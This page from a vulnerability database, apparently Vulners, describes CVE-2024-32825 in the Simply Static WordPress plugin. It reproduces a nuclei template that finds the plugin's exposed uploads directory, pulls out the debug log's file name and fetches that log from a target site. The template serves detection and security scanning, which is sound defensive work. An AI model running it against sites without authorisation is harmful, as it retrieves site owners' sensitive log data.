Lucene search
K

Simply Static - Information Disclosure

🗓️ 23 Apr 2026 08:24:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 10 Views

Simply Static up to 3.1.3 discloses sensitive data in logs due to improper handling; no privileges required; update to latest version.

Related
Refs
Code
id: CVE-2024-32825

info:
  name: Simply Static - Information Disclosure
  author: pussycat0x
  severity: medium
  description: |
    Patrick Posner Simply Static versions up to 3.1.3 contain a vulnerability for insertion of sensitive information into log files caused by improper handling of log data, letting attackers potentially access sensitive information, exploit requires no specific privileges.
  impact: |
    Attackers can access sensitive information stored in log files, leading to information disclosure.
  remediation:
    Update to the latest version of Simply Static that addresses this issue, or apply available patches.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/simply-static/simply-static-313-unauthenticated-information-exposure
    - https://www.cve.org/CVERecord?id=CVE-2024-32825
    - https://plugins.trac.wordpress.org/changeset/3025775/simply-static
  metadata:
    verified: true
    publicwww-query: "/wp-content/plugins/simply-static/"
  tags: cve,cve2024,wordpress,wp-plugin,simply-static

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/uploads/simply-static/"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "Index of", "debug.txt")'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: debug_file
        regex:
          - '([0-9a-z]+)\-debug\.txt'
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/wp-content/uploads/simply-static/{{debug_file}}"

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, ".php")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a00473045022100c0aa4db2bfcaa22fc8d0298ad61088b9a61e334ffe8356db0d70139316fd312d02200bdadada3fc8daeddb3e1467bbcc3544acb1bebec120827f285f8c23cf5569fc:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

23 Apr 2026 06:53Current
5.7Medium risk
Vulners AI Score5.7
CVSS 3.17.5
EPSS0.02015
SSVC
10